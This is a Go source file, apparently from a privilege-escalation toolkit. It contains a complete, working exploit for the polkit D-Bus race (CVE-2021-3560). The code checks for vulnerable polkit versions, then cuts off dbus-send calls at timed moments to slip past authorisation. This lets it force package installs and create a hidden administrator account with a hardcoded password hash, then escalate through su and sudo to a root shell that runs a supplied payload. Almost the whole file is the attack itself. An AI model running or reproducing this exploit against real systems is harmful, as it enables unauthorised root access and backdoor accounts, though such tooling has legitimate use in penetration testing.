package cve20213560

import (
	"context"
	"fmt"
	"io"
	"math/rand"
	"os"
	"os/exec"
	"os/signal"
	"os/user"
	"regexp"
	"strings"
	"syscall"
	"time"

	"github.com/creack/pty"
	"github.com/hashicorp/go-version"
	"github.com/liamg/traitor/internal/pipe"
	"github.com/liamg/traitor/pkg/logger"
	"github.com/liamg/traitor/pkg/payloads"
	"github.com/liamg/traitor/pkg/state"
	"golang.org/x/crypto/ssh/terminal"
)

type exploit struct {
}

func New() *exploit {
	exp := &exploit{}
	return exp
}

var simpleVersionRegex = regexp.MustCompile(`^[0-9\.\-]+`)

func (v *exploit) isVulnerableDebian(s *state.State) bool {

	if !s.IsDebianLike() {
		return false
	}

	out, err := exec.Command("sh", "-c", "apt info policykit-1 | grep 'Version:'").Output()
	if err != nil {
		return false
	}

	fields := strings.Fields(string(out))
	if len(fields) < 2 {
		return false
	}

	simpleVersion := simpleVersionRegex.FindString(fields[1])

	actual, err := version.NewVersion(simpleVersion)
	if err != nil {
		return false
	}

	vulnerable, err := version.NewVersion("0.105-26") // vuln was introduced in 0.105-26
	if err != nil {
		return false
	}
	patched, err := version.NewVersion("0.105-31") // vuln was patched in 0.105-31
	if err != nil {
		return false
	}

	return actual.GreaterThanOrEqual(vulnerable) && actual.LessThan(patched)
}

func (v *exploit) isVulnerableOther() bool {

	output, err := exec.Command("pkcheck", "--version").Output()
	if err != nil {
		return false
	}

	fields := strings.Fields(string(output))
	actualVersion := fields[len(fields)-1]
	actual, err := version.NewVersion(actualVersion)
	if err != nil {
		return false
	}

	vulnerable, err := version.NewVersion("0.113") // vuln was introduced in 0.113
	if err != nil {
		return false
	}
	patched, err := version.NewVersion("0.119") // vuln was patched in 0.113
	if err != nil {
		return false
	}

	return actual.GreaterThanOrEqual(vulnerable) && actual.LessThan(patched)
}

func (v *exploit) IsVulnerable(_ context.Context, s *state.State, log logger.Logger) bool {

	// two different forks are versioned differently
	if !v.isVulnerableDebian(s) && !v.isVulnerableOther() {
		return false
	}

	if !s.IsPackageInstalled("gnome-control-center") || !s.IsPackageInstalled("accountsservice") {
		// if required packages aren't installed, we may be able to install them with package kit...
		if !s.IsPackageInstalled("packagekit") {
			return false
		}
	}

	log.Printf("Polkit version is vulnerable!")
	return true
}

func (v *exploit) Shell(ctx context.Context, s *state.State, log logger.Logger) error {
	return v.Exploit(ctx, s, log, payloads.Defer)
}

func (v *exploit) Exploit(ctx context.Context, s *state.State, log logger.Logger, payload payloads.Payload) error {

	// attempt to install these via packagekit if they're not installed
	if err := v.installPackage("gnome-control-center", s, log); err != nil {
		return err
	}
	if err := v.installPackage("accountsservice", s, log); err != nil {
		return err
	}

	user, err := v.createUser(log)
	if err != nil {
		return fmt.Errorf("failed to create user")
	}

	password := v.setPassword(user, log)

	log.Printf("Setting up tty...")

	cmd := exec.Command("sh", "-c", fmt.Sprintf("su - %s", user.Username))

	// Start the command with a pty.
	ptmx, err := pty.Start(cmd)
	if err != nil {
		return err
	}
	// Make sure to close the pty at the end.
	defer func() { _ = ptmx.Close() }() // Best effort.

	// Handle pty size.
	ch := make(chan os.Signal, 1)
	signal.Notify(ch, syscall.SIGWINCH)
	go func() {
		for range ch {
			_ = pty.InheritSize(os.Stdin, ptmx)
		}
	}()
	ch <- syscall.SIGWINCH // Initial resize.

	// Set stdin in raw mode.
	oldState, err := terminal.MakeRaw(int(os.Stdin.Fd()))
	if err != nil {
		return err
	}
	defer func() { _ = terminal.Restore(int(os.Stdin.Fd()), oldState) }() // Best effort.

	expChan := make(chan error)

	lockable := pipe.NewLockable(ptmx)

	log.Printf("Attempting authentication as new user...")
	if err := lockable.WaitForString("Password:", time.Second*2); err == nil {
		_ = lockable.Flush()
		if _, err := ptmx.Write([]byte(fmt.Sprintf("%s\n", password))); err != nil {
			return err
		}
		if err := lockable.WaitForString("su: Authentication failure", time.Second*8); err == nil {
			_ = lockable.Flush()
			return fmt.Errorf("invalid password")
		}
		time.Sleep(time.Millisecond * 100)
	} else {
		return err
	}
	log.Printf("Authenticated as %s (%s)!", user.Username, user.Uid)

	log.Printf("Attempting escalation to root...")
	if _, err := ptmx.Write([]byte("sudo -i; exit\n")); err != nil {
		return err
	}
	if err := lockable.WaitForString("[sudo] password for", time.Second*8); err == nil {
		_ = lockable.Flush()
		if _, err := ptmx.Write([]byte(fmt.Sprintf("%s\n", password))); err != nil {
			return err
		}
	} else {
		return err
	}

	log.Printf("Authenticated as root!")

	log.Printf("Writing payload...")

	go func() {
		if payload != payloads.Defer {
			time.Sleep(time.Millisecond * 100)
			if _, err := ptmx.Write([]byte(payload)); err != nil {
				expChan <- err
				return
			}
			time.Sleep(time.Millisecond * 100)
			if _, err := ptmx.Write([]byte{0x0d, 0x0a}); err != nil {
				expChan <- err
				return
			}
		}
		expChan <- nil
	}()

	// Copy stdin to the pty and the pty to stdout.
	go func() { _, _ = io.Copy(ptmx, os.Stdin) }()
	_, _ = io.Copy(os.Stdout, lockable)

	if err := <-expChan; err != nil {
		return err
	}

	return nil
}

func (v *exploit) createUser(log logger.Logger) (*user.User, error) {

	username := fmt.Sprintf("traitor%d", rand.Intn(10000))
	userinfo := "CVE-2021-3560"

	createUser := fmt.Sprintf(`--system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:%s string:%s int32:1`,
		username,
		userinfo,
	)

	log.Printf("Sampling timing of user creation command...")

	avgTime := v.timeDbusCommand(strings.Split(createUser, " "))

	log.Printf("Average time for user creation to fail authentication is %s", avgTime)

	log.Printf("Attempting to create user '%s' by forcing UID=0...", username)

	for delayTime := avgTime / 4; delayTime < avgTime; delayTime += time.Millisecond {
		for i := 0; i < 10; i++ {
			func() {
				ctx, cancel := context.WithTimeout(context.Background(), delayTime)
				defer cancel()
				_ = exec.CommandContext(ctx, "dbus-send", strings.Split(createUser, " ")...).Run()
			}()
		}
	}

	user, err := user.Lookup(username)
	if err != nil {
		return nil, err
	}

	log.Printf("User '%s' was created with UID (%s)!", user.Username, user.Uid)
	return user, nil
}

func (v *exploit) setPassword(u *user.User, log logger.Logger) string {

	password := "traitor"
	passwordHash := "$5$xRveGoW.etBZqJwg$uEvtrnKPbuEvTxJAisVrCevthWxafgX6.uAS6uF7QW7"

	setPassword := fmt.Sprintf(
		`--system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User%s org.freedesktop.Accounts.User.SetPassword string:%s string:lol`,
		u.Uid,
		passwordHash,
	)

	log.Printf("Sampling timing of password set command...")

	avgTime := v.timeDbusCommand(strings.Split(setPassword, " "))

	log.Printf("Average time for password set to fail authentication is %s", avgTime)

	log.Printf("Attempting to set user password...")

	for delayTime := avgTime / 4; delayTime < avgTime; delayTime += time.Millisecond / 4 {
		for i := 0; i < 10; i++ {
			func() {
				ctx, cancel := context.WithTimeout(context.Background(), delayTime)
				defer cancel()
				_ = exec.CommandContext(ctx, "dbus-send", strings.Split(setPassword, " ")...).Run()
			}()
		}
	}

	log.Printf("Finished attempting to set password.")
	return password
}

func (v *exploit) timeDbusCommand(args []string) time.Duration {

	var totalTime time.Duration
	samples := 100

	for i := 0; i < samples; i++ {
		start := time.Now()
		_ = exec.Command("dbus-send", args...).Run()
		totalTime += time.Since(start)
	}

	return totalTime / time.Duration(samples)
}

func (v *exploit) installPackage(name string, s *state.State, log logger.Logger) error {

	if s.IsPackageInstalled(name) {
		return nil
	}

	if !s.IsPackageInstalled("packagekit") {
		return fmt.Errorf("required packages are not available")
	}

	log.Printf("Package '%s' is not installed, trying to force installation via packagekit...", name)

	installPackage := fmt.Sprintf(`--session --print-reply --type=method_call --dest=org.freedesktop.PackageKit /org/freedesktop/PackageKit org.freedesktop.PackageKit.Modify.InstallPackageNames uint32:1 array:string:%s string:`,
		name,
	)

	log.Printf("Sampling timing of package installation command...")

	avgTime := v.timeDbusCommand(strings.Split(installPackage, " "))

	log.Printf("Average time for package install to fail authentication is %s", avgTime)

	log.Printf("Attempting to install '%s' by forcing UID=0...", name)
	log.Printf("Please wait ~60s...")

	for delayTime := avgTime / 4; delayTime < avgTime; delayTime += time.Millisecond {
		for i := 0; i < 10; i++ {
			func() {
				ctx, cancel := context.WithTimeout(context.Background(), delayTime)
				defer cancel()
				_ = exec.CommandContext(ctx, "dbus-send", strings.Split(installPackage, " ")...).Run()
			}()
		}
	}

	time.Sleep(time.Minute)

	if !s.IsPackageInstalled(name) {
		return fmt.Errorf("failed to force install of '%s' via packagekit", name)
	}

	log.Printf("Package '%s' was installed!", name)
	return nil
}
